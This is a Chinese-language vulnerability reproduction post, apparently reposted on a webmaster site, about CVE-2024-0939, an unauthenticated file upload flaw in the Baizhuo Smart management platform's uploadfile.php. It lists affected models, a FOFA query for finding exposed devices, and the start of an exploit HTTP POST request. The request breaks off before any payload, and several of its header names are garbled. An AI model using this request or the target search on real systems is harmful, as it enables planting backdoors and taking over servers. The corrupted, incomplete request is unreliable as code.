百卓Smart管理平台 uploadfile.php 文件上传漏洞复现(CVE-2024-0939)

百卓Smart管理平台 uploadfile.php 文件上传漏洞复现(CVE-2024-0939)

0x01 产品简介

百卓Smart管理平台是北京百卓网络技术有限公司(以下简称百卓网络)的一款安全网关产品,是一家致力于构建下一代安全互联网的高科技企业。

0x02 漏洞概述

百卓Smart管理平台 uploadfile.php 接口存在任意文件上传漏洞。未经身份验证的攻击者可以利用此漏洞上传恶意后门文件,执行任意指令,从而获得服务器权限并操纵服务器文件。

0x03 影响范围

smart_s210

smart_s210_firmware

0x04 复现环境

FOFA:title="Smart管理平台"

0x05 漏洞复现

PoC

POST /Tool/uploadfile.php? HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
A***ept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
A***ept-Language: zh-***,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
A***ept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------1397
转载请说明出处内容投诉
CSS教程_站长资源网 » 百卓Smart管理平台 uploadfile.php 文件上传漏洞复现(CVE-2024-0939)

发表评论

欢迎 访客 发表评论

一个令你着迷的主题!

查看演示 官网购买